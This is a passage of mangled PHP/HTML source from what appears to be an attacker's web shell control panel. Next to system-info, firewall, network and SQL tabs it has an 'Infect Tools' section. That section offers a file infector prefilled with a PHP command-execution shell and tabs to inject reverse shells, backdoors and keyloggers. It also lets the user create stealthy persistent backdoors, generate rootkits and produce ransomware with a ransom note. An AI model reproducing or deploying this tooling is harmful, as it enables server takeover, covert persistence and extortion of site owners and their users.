</div>  <div class="tab-content active" id="ping-tab">

<div style="margin-bottom:15px;"> <label>Target (IP/Domain):</label> <div style="display:flex;"> <select name="ping_count" style="width:auto;margin-left:10px;"> <option value="4">4 packets</option> <option value="8">8 packets</option> <option value="16">16 packets</option> </select> </div> </div> <button type="submit" class="btn"><i class="fas fa-exchange-alt"></i> Ping</button>

</div>  <div class="tab-content" id="change-mac-tab"> </div>  <div class="tab-content" id="firewall-tab">

<div style="margin-bottom:15px;"> <label>Firewall Action:</label> <select name="firewall_action"> <option value="status">Check Status</option> <option value="enable">Enable Firewall</option> <option value="disable">Disable Firewall</option> <option value="reset">Reset to Default</option> </select> <small style="color:var(--text-muted);display:block;margin-top:5px;">Note: Some actions require administrative privileges</small> </div> <button type="submit" class="btn"><i class="fas fa-shield-alt"></i> Execute</button>

</div>  <div class="tab-content" id="bandwidth-tab">

<div style="margin-bottom:15px;"> <label>Monitor Duration (seconds):</label> <select name="monitor_duration"> <option value="5">5 seconds</option> <option value="10">10 seconds</option> <option value="15">15 seconds</option> </select> <small style="color:var(--text-muted);display:block;margin-top:5px;">Uses netstat/iftop to monitor network activity</small> </div> <button type="submit" class="btn"><i class="fas fa-tachometer-alt"></i> Start Monitoring</button>

</div>  <div class="tab-content" id="network-scan-tab"> </div>  <div id="network-results" style="margin-top:20px; echo empty($network_result) ? 'display:none;' : ''; "> <h4>Results</h4> <pre style="background:var(--bg-light);color:var(--text);padding:15px;border-radius:4px;max-height:500px;overflow:auto;"> echo htmlspecialchars($network_result); </pre> </div> </div> </div> </div>  if ($active_tab === 'infect'): <div class="card"> <div class="card-header">

<i class="fas fa-virus"></i> Infect Tools

</div> <div class="card-body"> <div class="tab-container"> <div class="tabs"> <div class="tab active" data-tab="file-infector"><i class="fas fa-file-code"></i> File Infector</div> <div class="tab" data-tab="inject-payload"><i class="fas fa-syringe"></i> Inject Payload</div> <div class="tab" data-tab="create-backdoor"><i class="fas fa-door-open"></i> Create Backdoor</div> <div class="tab" data-tab="rootkit"><i class="fas fa-user-secret"></i> Rootkit</div> <div class="tab" data-tab="ransomware"><i class="fas fa-lock"></i> Ransomware</div> </div>  <div class="tab-content active" id="file-infector-tab">

<div style="margin-bottom:15px;"> <label>Target Directory:</label> </div> <div style="margin-bottom:15px;"> <label>File Extensions:</label> <select name="file_ext"> <option value="php">PHP Files (.php)</option> <option value="js">JavaScript Files (.js)</option> <option value="html">HTML Files (.html, .htm)</option> <option value="all">All Files</option> </select> </div> <div style="margin-bottom:15px;"> <label>Infection Method:</label> <select name="infect_method"> <option value="prepend">Prepend Code</option> <option value="append">Append Code</option> <option value="replace">Replace Content</option> </select> </div> <div style="margin-bottom:15px;"> <label>Code to Inject:</label> <textarea name="infect_code" placeholder="Enter code to inject..." style="min-height:150px;">// Basic PHP shell code as default exampleecho 'if(isset($_REQUEST["cmd"])){ $cmd = ($_REQUEST["cmd"]); system($cmd);}';</textarea> </div> <div style="display:flex;align-items:center;margin-bottom:15px;"> <label for="recursive_inject">Recursively infect subdirectories</label> </div> <button type="submit" class="btn" style="background-color:#dc3545;"><i class="fas fa-virus"></i> Infect Files</button>

</div>  <div class="tab-content" id="inject-payload-tab">

<div style="margin-bottom:15px;"> <label>Target File:</label> </div> <div style="margin-bottom:15px;"> <label>Payload Type:</label> <select name="payload_type"> <option value="shell">Reverse Shell</option> <option value="backdoor">Backdoor Script</option> <option value="keylogger">Keylogger</option> <option value="custom">Custom Payload</option> </select> </div> <div style="margin-bottom:15px;"> <label>IP Address (for reverse shells):</label> </div> <div style="margin-bottom:15px;"> <label>Port:</label> </div> <div style="margin-bottom:15px;"> <label>Custom Payload:</label> <textarea name="custom_payload" placeholder="Enter custom code here..." style="min-height:150px;"></textarea> </div> <button type="submit" class="btn" style="background-color:#dc3545;"><i class="fas fa-syringe"></i> Inject Payload</button>

</div>  <div class="tab-content" id="create-backdoor-tab">

<div style="margin-bottom:15px;"> <label>Backdoor Type:</label> <select name="backdoor_type" id="backdoor_type"> <option value="php_shell">PHP Shell</option> <option value="php_upload">PHP File Upload</option> <option value="reverse_shell">PHP Reverse Shell</option> <option value="webshell">Web Shell (JSP/ASP/PHP)</option> </select> </div> <div style="margin-bottom:15px;"> <label>Save to Directory:</label> </div> <div style="margin-bottom:15px;"> <label>Filename:</label> </div> <div style="margin-bottom:15px;"> <label>Password Protection:</label> </div> <div id="reverse_shell_options" style="display:none;margin-bottom:15px;"> <label>Reverse Shell IP:</label> <label style="margin-top:10px;">Reverse Shell Port:</label> </div> <div style="margin-bottom:15px;"> <label>Additional Options:</label> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="backdoor_stealth">Add stealth mode (hide from directory listings)</label> </div> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="backdoor_persistent">Make backdoor persistent (attempt to survive restarts)</label> </div> </div> <button type="submit" class="btn" style="background-color:#dc3545;"><i class="fas fa-door-open"></i> Create Backdoor</button>

</div>  <div class="tab-content" id="rootkit-tab">

<div style="margin-bottom:15px;"> <label>Rootkit Type:</label> <select name="rootkit_type"> <option value="usermode">User Mode Rootkit (Less persistent but easier to deploy)</option> <option value="kernelmode" disabled>Kernel Mode Rootkit (Requires compilation)</option> </select> </div> <div style="margin-bottom:15px;"> <label>Target System:</label> <select name="rootkit_os"> <option value="linux">Linux</option> <option value="windows">Windows</option> <option value="macos">MacOS</option> </select> </div> <div style="margin-bottom:15px;"> <label>Features to Include:</label> <div style="background:var(--bg-light);padding:10px;border-radius:5px;"> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="feat_hide_files">Hide Files/Directories</label> </div> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="feat_hide_processes">Hide Processes</label> </div> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="feat_backdoor">Create Backdoor</label> </div> <div style="display:flex;align-items:center;margin-bottom:5px;"> <label for="feat_privilege">Privilege Escalation</label> </div> </div> </div> <div style="margin-bottom:15px;"> <label>Output Directory:</label> </div> <button type="submit" class="btn" style="background-color:#dc3545;"><i class="fas fa-user-secret"></i> Generate Rootkit</button>

</div>  <div class="tab-content" id="ransomware-tab">

<div style="margin-bottom:15px;"> <label>Target Directory:</label> </div> <div style="margin-bottom:15px;"> <label>Files to Encrypt:</label> <select name="ransomware_files"> <option value="docs">Documents (doc, pdf, txt, etc.)</option> <option value="media">Media Files (jpg, png, mp3, etc.)</option> <option value="all">All Files</option> <option value="custom">Custom Extensions</option> </select> </div> <div style="margin-bottom:15px;"> <label>Custom Extensions (comma separated):</label> </div> <div style="margin-bottom:15px;"> <label>Ransom Message:</label> <textarea name="ransom_message" style="min-height:100px;">Your files have been encrypted. To decrypt your files, please send payment to the following address.</textarea> </div> <div style="margin-bottom:15px;"> <label>Encryption Method:</label> <select name="encryption_method"> <option value="aes">AES-256</option> <option value="rsa">RSA</option> </select> </div> <div style="margin-bottom:15px;"> <label>Key Storage Location:</label> </div> <button type="submit" class="btn" style="background-color:#dc3545;"><i class="fas fa-lock"></i> Generate Ransomware</button>

</div>  <div id="infect-results" style="margin-top:20px; echo empty($infect_result) ? 'display:none;' : ''; "> <h4>Results</h4> <pre style="background:var(--bg-light);color:var(--text);padding:15px;border-radius:4px;max-height:500px;overflow:auto;"> echo isset($infect_result) ? htmlspecialchars($infect_result) : ''; </pre> </div> </div> </div> </div> endif;  if ($active_tab === 'database'): <div class="card" style="margin-top:20px;"> <div class="card-header">

<i class="fas fa-database"></i> Database Management

</div> <div class="card-body">

<h4>New Database Connection</h4> <div style="display:flex;flex-wrap:wrap;gap:15px;margin-bottom:15px;"> <div style="flex:1;min-width:200px;"> <label>Database Type:</label> <select name="db_type"> <option value="mysql">MySQL</option> <option value="sqlite">SQLite</option> </select> </div> <div style="flex:1;min-width:200px;"> <label>Host:</label> </div> <div style="flex:1;min-width:200px;"> <label>Username:</label> </div> <div style="flex:1;min-width:200px;"> <label>Password:</label> </div> <div style="flex:1;min-width:200px;"> <label>Database:</label> </div> </div> <button type="submit" class="btn"><i class="fas fa-plug"></i> Save Connection</button>

if (!empty($db_connections)):  <div style="margin-top:20px;"> <h4>Saved Connections</h4> <div class="table-responsive"> <thead> <th>Type</th> <th>Host</th> <th>User</th> <th>Database</th> <th>Actions</th> </thead> <tbody> foreach ($db_connections as $id => $conn): <td class="action-links"> <button type="submit" class="btn-danger" style="border:none;padding:3px 8px;border-radius:4px;cursor:pointer;"><i class="fas fa-unlink"></i> Remove</button> endforeach; </tbody>

echo htmlspecialchars($conn['type']);

echo htmlspecialchars($conn['host']);

echo htmlspecialchars($conn['user']);

echo htmlspecialchars($conn['name']);

</div> </div>  <div style="margin-top:20px;"> <h4>Execute SQL Query</h4>

<div style="margin-bottom:15px;"> <label>Select Connection:</label> <select name="db_conn_id" required> <option value="">-- Select Connection --</option> foreach ($db_connections as $id => $conn): <option value=" echo htmlspecialchars($id); "> echo htmlspecialchars($conn['type'] . ' - ' . $conn['user'] . '@' . $conn['host'] . '/' . $conn['name']); </option> endforeach; </select> </div> <div style="margin-bottom:15px;"> <label>SQL Query:</label> <textarea name="db_query" placeholder="Enter SQL query..." style="min-height:100px;"></textarea> </div> <button type="submit" class="btn"><i class="fas fa-play"></i> Execute Query</button>

</div> endif;  if (!empty($db_message)): <div style="margin-top:20px;"> <div style="padding:10px;border-left:4px solid var(--info);background:rgba(52,152,219,0.1);color:var(--info);"> echo htmlspecialchars($db_message); </div> </div> endif; if (isset($_SESSION['db_results']) && !empty($_SESSION['db_results']['data'])): <div style="margin-top:20px;"> <h4>Query Results</h4> <div class="table-responsive"> <thead> foreach ($_SESSION['db_results']['fields'] as $field): <th> echo htmlspecialchars($field); </th> endforeach; </thead> <tbody> foreach ($_SESSION['db_results']['data'] as $row): foreach ($row as $cell): endforeach; endforeach; </tbody>

echo htmlspecialchars($cell);

</div> </div> endif; </div> </div> endif;  <div class="card" style="margin-top:20px;"> <div class="card-header">

<i class="fas fa-info-circle"></i> System Information

</div> <div class="card-body">  <div class="tab-container" style="margin-bottom:20px;"> <div class="tabs"> <div class="tab active" data-tab="server-info"><i class="fas fa-server"></i> Server Info</div> <div class="tab" data-tab="system-resources"><i class="fas fa-microchip"></i> System Resources</div> <div class="tab" data-tab="disk-usage"><i class="fas fa-hdd"></i> Disk Usage</div> <div class="tab" data-tab="php-config"><i class="fab fa-php"></i> PHP Configuration</div> </div>  <div class="tab-content active" id="server-info-tab"> <div style="background:var(--bg-lighter);padding:15px;border-radius:8px;">  <div style="text-align:right;margin-bottom:15px;"> <a href="?dir= echo urlencode($dir); &tab=info&refresh=1" class="btn" style="display:inline-flex;align-items:center;gap:5px;"> <i class="fas fa-sync-alt"></i> Refresh Info </a> </div> <div style="display:grid;grid-template-columns:1fr;grid-gap:15px;">  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-laptop"></i> Operating System </h5> <table style="width:100%;border-collapse:collapse;"> <tbody> if (isset($system_resources['os_full_name'])): <td style="padding:4px 8px;"><strong>OS Name</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['os_full_name']); else: <td style="padding:4px 8px;"><strong>OS Type</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['os_name']); endif; if (isset($system_resources['os_full_version'])): <td style="padding:4px 8px;"><strong>OS Version</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['os_full_version']); endif; if (isset($system_resources['os_build'])): <td style="padding:4px 8px;"><strong>Build Number</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['os_build']); endif; <td style="padding:4px 8px;"><strong>Architecture</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['os_architecture']); <td style="padding:4px 8px;"><strong>Kernel</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['kernel']); <td style="padding:4px 8px;"><strong>Hostname</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['hostname']); if (isset($system_resources['system_uptime'])): <td style="padding:4px 8px;"><strong>Uptime</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['system_uptime']); endif; </tbody> </div>  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-microchip"></i> Hardware Information </h5> <table style="width:100%;border-collapse:collapse;"> <tbody> if (isset($system_resources['cpu_model'])): <td style="padding:4px 8px;"><strong>CPU Model</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['cpu_model']); endif; if (isset($system_resources['cpu_cores'])): <td style="padding:4px 8px;"><strong>CPU Cores</strong> <td style="padding:4px 8px;"> echo $system_resources['cpu_cores']; cores if (isset($system_resources['cpu_threads'])): ( echo $system_resources['cpu_threads']; threads) endif; endif; if (isset($system_resources['cpu_speed'])): <td style="padding:4px 8px;"><strong>CPU Clock Speed</strong> <td style="padding:4px 8px;"> echo $system_resources['cpu_speed']; endif; if (isset($system_resources['l2_cache']) || isset($system_resources['l3_cache']) || isset($system_resources['cpu_cache'])): <td style="padding:4px 8px;"><strong>CPU Cache</strong> <td style="padding:4px 8px;"> if (isset($system_resources['cpu_cache'])) { echo $system_resources['cpu_cache']; } else { if (isset($system_resources['l2_cache'])) { echo "L2: " . $system_resources['l2_cache']; } if (isset($system_resources['l3_cache'])) { echo isset($system_resources['l2_cache']) ? ", " : ""; echo "L3: " . $system_resources['l3_cache']; } } endif; <td style="padding:4px 8px;"><strong>Total Memory</strong> <td style="padding:4px 8px;"> echo $system_resources['total_memory']; if (isset($system_resources['swap_total'])): <td style="padding:4px 8px;"><strong>Swap Memory</strong> <td style="padding:4px 8px;"> echo $system_resources['swap_total']; endif; </tbody> </div>  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-globe"></i> Web Server Information </h5> <table style="width:100%;border-collapse:collapse;"> <tbody> <td style="padding:4px 8px;"><strong>Web Server</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['web_server']); <td style="padding:4px 8px;"><strong>PHP Version</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_version']); <td style="padding:4px 8px;"><strong>Server API</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_sapi']); <td style="padding:4px 8px;"><strong>Document Root</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($system_resources['document_root']); <td style="padding:4px 8px;"><strong>HTTP Host</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['http_host']); <td style="padding:4px 8px;"><strong>Protocol</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['server_protocol']); if (!empty($system_resources['server_admin']) && $system_resources['server_admin'] !== 'Unknown'): <td style="padding:4px 8px;"><strong>Server Admin</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['server_admin']); endif; <td style="padding:4px 8px;"><strong>Request Time</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['request_time']); </tbody> </div>  if (isset($system_resources['network_interfaces']) && !empty($system_resources['network_interfaces'])): <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-network-wired"></i> Network Interfaces </h5> foreach ($system_resources['network_interfaces'] as $index => $interface): <div style="margin-bottom:15px; echo $index > 0 ? 'border-top:1px solid var(--border);padding-top:15px;' : ''; "> <h6 style="margin-bottom:8px;"> echo htmlspecialchars($interface['name'] ?? 'Interface ' . ($index + 1)); </h6> <table style="width:100%;border-collapse:collapse;"> <tbody> <td style="padding:4px 8px;"><strong>IP Address</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($interface['ip'] ?? 'Unknown'); <td style="padding:4px 8px;"><strong>MAC Address</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($interface['mac'] ?? 'Unknown'); if (isset($interface['gateway'])): <td style="padding:4px 8px;"><strong>Gateway</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($interface['gateway']); endif; </tbody> </div> endforeach; </div> endif;  if (isset($system_resources['disks']) && !empty($system_resources['disks'])): <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-hdd"></i> Disk Information </h5> foreach ($system_resources['disks'] as $index => $disk): <div style="margin-bottom:15px; echo $index > 0 ? 'border-top:1px solid var(--border);padding-top:15px;' : ''; "> <h6 style="margin-bottom:8px;"> if (isset($disk['drive'])) { echo htmlspecialchars($disk['drive']); } elseif (isset($disk['device'])) { echo htmlspecialchars($disk['device']); } else { echo 'Disk ' . ($index + 1); } </h6> <table style="width:100%;border-collapse:collapse;"> <tbody> if (isset($disk['mount_point'])): <td style="padding:4px 8px;"><strong>Mount Point</strong> <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($disk['mount_point']); endif; if (isset($disk['filesystem'])): <td style="padding:4px 8px;"><strong>File System</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($disk['filesystem']); endif; <td style="padding:4px 8px;"><strong>Total Space</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($disk['total']); <td style="padding:4px 8px;"><strong>Used Space</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($disk['used']); ( echo $disk['percent']; %) <td style="padding:4px 8px;"><strong>Free Space</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($disk['free']); <td colspan="2" style="padding:4px 8px;"> <div style="height:12px;background:#333;border-radius:3px;overflow:hidden;position:relative;margin-top:5px;"> <div style="height:100%;width: echo $disk['percent']; %;background: echo $disk['percent'] > 90 ? 'var(--danger)' : ($disk['percent'] > 70 ? 'var(--warning)' : 'var(--primary)'); ;"></div> </div> </tbody> </div> endforeach; </div> endif;  if (isset($system_resources['installed_software']) && !empty($system_resources['installed_software'])): <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-cubes"></i> Installed Software </h5> <div style="max-height:300px;overflow-y:auto;"> <table style="width:100%;border-collapse:collapse;"> <thead> <th style="padding:4px 8px;text-align:left;background:var(--bg-dark);">Name</th> <th style="padding:4px 8px;text-align:left;background:var(--bg-dark);">Version</th> </thead> <tbody> foreach ($system_resources['installed_software'] as $software): <td style="padding:4px 8px;word-break:break-word;"> echo htmlspecialchars($software['name']); <td style="padding:4px 8px;"> echo htmlspecialchars($software['version']); endforeach; </tbody> <div style="font-size:12px;color:var(--text-muted);margin-top:8px;text-align:right;"> Limited to 10 entries </div> </div> </div> endif;  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;"> <i class="fas fa-cogs"></i> PHP Configuration </h5> <table style="width:100%;border-collapse:collapse;"> <tbody> <td style="padding:4px 8px;"><strong>Memory Limit</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_memory_limit']); <td style="padding:4px 8px;"><strong>Max Execution Time</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_max_execution_time']); <td style="padding:4px 8px;"><strong>Upload Max Filesize</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_upload_max_filesize']); <td style="padding:4px 8px;"><strong>Post Max Size</strong> <td style="padding:4px 8px;"> echo htmlspecialchars($system_resources['php_post_max_size']); if (isset($system_resources['load_avg_1m'])): <td style="padding:4px 8px;"><strong>Load Average</strong> <td style="padding:4px 8px;"> echo $system_resources['load_avg_1m']; (1m) if (isset($system_resources['load_avg_5m'])): , echo $system_resources['load_avg_5m']; (5m) endif; if (isset($system_resources['load_avg_15m'])): , echo $system_resources['load_avg_15m']; (15m) endif; endif; if (isset($system_resources['process_count'])): <td style="padding:4px 8px;"><strong>Running Processes</strong> <td style="padding:4px 8px;"> echo $system_resources['process_count']; endif; </tbody> </div> </div> </div> </div>  <div class="tab-content" id="system-resources-tab"> <div style="background:var(--bg-lighter);padding:15px;border-radius:8px;">  <div style="text-align:right;margin-bottom:15px;"> <a href="?dir= echo urlencode($dir); &tab=info&refresh=1" class="btn" style="display:inline-flex;align-items:center;gap:5px;"> <i class="fas fa-sync-alt"></i> Refresh Resources </a> <div style="font-size:12px;color:var(--text-muted);margin-top:5px;">Last updated: echo file_exists($system_resources_cache_file) ? date('H:i:s', filemtime($system_resources_cache_file)) : date('H:i:s'); </div> </div>  <div style="margin-bottom:20px;"> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;">CPU Information</h5> if (isset($system_resources['cpu_model'])): <div style="margin-bottom:10px;"> <strong>CPU Model:</strong> echo htmlspecialchars($system_resources['cpu_model']); </div> endif; if (isset($system_resources['cpu_cores'])): <div style="margin-bottom:10px;"> <strong>CPU Cores:</strong> echo $system_resources['cpu_cores']; if (isset($system_resources['cpu_threads'])): ( echo $system_resources['cpu_threads']; Threads) endif; </div> endif; if (isset($system_resources['cpu_usage'])): <div style="margin-bottom:10px;"> <div style="display:flex;align-items:center;justify-content:space-between;margin-bottom:5px;"> <strong>CPU Usage:</strong> <span> echo $system_resources['cpu_usage']; </span> </div> <div style="height:30px;background:#333;border-radius:5px;overflow:hidden;position:relative;"> <div style="height:100%;width: echo isset($system_resources['cpu_percent']) ? $system_resources['cpu_percent'] : 0; %;background: echo (isset($system_resources['cpu_percent']) && $system_resources['cpu_percent'] > 90) ? 'var(--danger)' : ((isset($system_resources['cpu_percent']) && $system_resources['cpu_percent'] > 70) ? 'var(--warning)' : 'var(--primary)'); ;"></div> </div> </div> endif; </div>  <div style="margin-bottom:20px;"> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;">Memory Usage</h5> if (isset($system_resources['total_memory'])): <div style="margin-bottom:10px;"> <strong>Total Memory:</strong> echo $system_resources['total_memory']; </div> endif; if (isset($system_resources['used_memory'])): <div style="margin-bottom:10px;"> <strong>Used Memory:</strong> echo $system_resources['used_memory']; if (isset($system_resources['memory_percent'])): ( echo $system_resources['memory_percent']; %) endif; </div> endif; if (isset($system_resources['free_memory'])): <div style="margin-bottom:10px;"> <strong>Free Memory:</strong> echo $system_resources['free_memory']; </div> endif; if (isset($system_resources['memory_percent'])): <div style="height:30px;background:#333;border-radius:5px;overflow:hidden;position:relative;margin-bottom:10px;"> <div style="height:100%;width: echo $system_resources['memory_percent']; %;background: echo $system_resources['memory_percent'] > 90 ? 'var(--danger)' : ($system_resources['memory_percent'] > 70 ? 'var(--warning)' : 'var(--primary)'); ;"></div> </div> <div style="display:flex;justify-content:space-between;"> <div>0%</div> <div>Memory Usage: echo $system_resources['memory_percent']; %</div> <div>100%</div> </div> endif; </div>  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;">System Status</h5> if (isset($system_resources['system_uptime'])): <div style="margin-bottom:10px;"> <strong>System Uptime:</strong> echo htmlspecialchars($system_resources['system_uptime']); </div> endif; if (isset($system_resources['process_count'])): <div style="margin-bottom:10px;"> <strong>Running Processes:</strong> echo $system_resources['process_count']; </div> endif; if (isset($system_resources['load_avg_1m'])): <div style="margin-bottom:10px;"> <strong>Load Average:</strong> <span> echo $system_resources['load_avg_1m']; (1m)</span> if (isset($system_resources['load_avg_5m'])): <span>, echo $system_resources['load_avg_5m']; (5m)</span> endif; if (isset($system_resources['load_avg_15m'])): <span>, echo $system_resources['load_avg_15m']; (15m)</span> endif; </div> endif; </div>  <div style="margin-bottom:20px;"> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;">Resource Usage Overview</h5> <div style="display:flex;flex-wrap:wrap;gap:20px;justify-content:center;">  if (isset($system_resources['cpu_percent'])): <div style="text-align:center;"> <div style="width:120px;height:120px;position:relative;border-radius:50%;background:conic-gradient( echo $system_resources['cpu_percent'] > 90 ? 'var(--danger)' : ($system_resources['cpu_percent'] > 70 ? 'var(--warning)' : 'var(--primary)'); 0% echo $system_resources['cpu_percent']; %, #333 echo $system_resources['cpu_percent']; % 100% );margin:15px auto;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:60%;height:60%;background:var(--bg-lighter);border-radius:50%;display:flex;align-items:center;justify-content:center;flex-direction:column;"> <strong style="font-size:18px;"> echo $system_resources['cpu_percent']; %</strong> <span style="font-size:12px;">CPU</span> </div> </div> </div> endif;  if (isset($system_resources['memory_percent'])): <div style="text-align:center;"> <div style="width:120px;height:120px;position:relative;border-radius:50%;background:conic-gradient( echo $system_resources['memory_percent'] > 90 ? 'var(--danger)' : ($system_resources['memory_percent'] > 70 ? 'var(--warning)' : 'var(--primary)'); 0% echo $system_resources['memory_percent']; %, #333 echo $system_resources['memory_percent']; % 100% );margin:15px auto;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:60%;height:60%;background:var(--bg-lighter);border-radius:50%;display:flex;align-items:center;justify-content:center;flex-direction:column;"> <strong style="font-size:18px;"> echo $system_resources['memory_percent']; %</strong> <span style="font-size:12px;">Memory</span> </div> </div> </div> endif;  if (isset($system_resources['disk_percent'])): <div style="text-align:center;"> <div style="width:120px;height:120px;position:relative;border-radius:50%;background:conic-gradient( echo $system_resources['disk_percent'] > 90 ? 'var(--danger)' : ($system_resources['disk_percent'] > 70 ? 'var(--warning)' : 'var(--primary)'); 0% echo $system_resources['disk_percent']; %, #333 echo $system_resources['disk_percent']; % 100% );margin:15px auto;"> <div style="position:absolute;top:50%;left:50%;transform:translate(-50%, -50%);width:60%;height:60%;background:var(--bg-lighter);border-radius:50%;display:flex;align-items:center;justify-content:center;flex-direction:column;"> <strong style="font-size:18px;"> echo $system_resources['disk_percent']; %</strong> <span style="font-size:12px;">Disk</span> </div> </div> </div> endif; </div> </div>  <div> <h5 style="margin-bottom:10px;background:var(--bg-dark);padding:5px 10px;border-radius:4px;">System Health</h5> // Calculate overall system health $health_factors = []; if (isset($system_resources['cpu_percent'])) { $health_factors[] = $system_resources['cpu_percent']; } if (isset($system_resources['memory_percent'])) { $health_factors[] = $system_resources['memory_percent']; } if (isset($system_resources['disk_percent'])) { $health_factors[] = $system_resources['disk_percent']; } $overall_health = !empty($health_factors) ? array_sum($health_factors) / count($health_factors) : 0; $health_status = "Good"; $health_icon = "fa-check-circle"; $health_color = "var(--success)"; $health_bg = "rgba(0,128,0,0.1)"; $health_message = "System resources are at healthy levels."; if ($overall_health > 90) { $health_status = "Critical"; $health_icon = "fa-exclamation-triangle"; $health_color = "var(--danger)"; $health_bg = "rgba(255,0,0,0.1)"; $health_message = "System resources are critically low! Immediate action recommended."; } elseif ($overall_health > 70) { $health_status = "Warning"; $health_icon = "fa-exclamation-circle"; $health_color = "var(--warning)"; $health_bg = "rgba(255,165,0,0.1)"; $health_message = "System resources are under pressure. Consider optimizing resource usage."; } <div style="background: echo $health_bg; ;padding:15px;border-radius:5px;border-left:4px solid echo $health_color; ;"> <div style="font-weight:bold;margin-bottom:5px;"> <i class="fas echo $health_icon; "></i> System Health: echo $health_status; </div> <div> echo $health_message; </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="text-align:center;margin-top:30px;margin-bottom:20px;color:#777;padding-top:20px;border-top:1px solid var(--border);"> <p>Made with ❤️ by <a href="https://fb.com/rahimi0t0" target="_blank" style="color:var(--primary);">fb.com/rahimi0t0</a> © echo date('Y'); | Server Time: echo date('Y-m-d H:i:s'); </p> </div> <div style="display:flex;justify-content:center;align-items:center;margin-top:20px;"> <button id="theme-toggle" class="btn" style="background:var(--bg-light);padding:12px 20px;border-radius:30px;display:flex;align-items:center;gap:10px;transition:all 0.3s ease;"> <i class="fas fa-moon" style="font-size:18px;color:var(--primary);"></i> </button> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/codemirror.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/javascript/javascript.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/css/css.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/xml/xml.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/php/php.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/htmlmixed/htmlmixed.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/mode/sql/sql.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.12/addon/edit/matchbrackets.min.js"></script> <script> // Tab switching functionality document.addEventListener('DOMContentLoaded', function() { // Initialize all tab containers initializeAllTabContainers(); // File management button actions const newFileBtn = document.getElementById('new-file-btn'); const newDirBtn = document.getElementById('new-dir-btn'); const uploadBtn = document.getElementById('upload-btn'); // Theme persistence function setTheme(isDark) { const root = document.documentElement; const themeToggle = document.getElementById('theme-toggle'); if (!isDark) { // Light theme root.style.setProperty('--primary', '#4CAF50'); root.style.setProperty('--primary-dark', '#3e8e41'); root.style.setProperty('--bg-dark', '#f0f0f0'); root.style.setProperty('--bg-lighter', '#ffffff'); root.style.setProperty('--bg-light', '#e9e9e9'); root.style.setProperty('--text', '#333333'); root.style.setProperty('--text-muted', '#777777'); root.style.setProperty('--border', '#dddddd'); // Update button appearance themeToggle.innerHTML = '<i class="fas fa-sun" style="font-size:18px;color:#f39c12;"></i>'; themeToggle.style.background = '#ffffff'; themeToggle.style.boxShadow = '0 2px 10px rgba(0,0,0,0.1)'; localStorage.setItem('theme', 'light'); } else { // Dark theme root.style.setProperty('--primary', '#4CAF50'); root.style.setProperty('--primary-dark', '#3e8e41'); 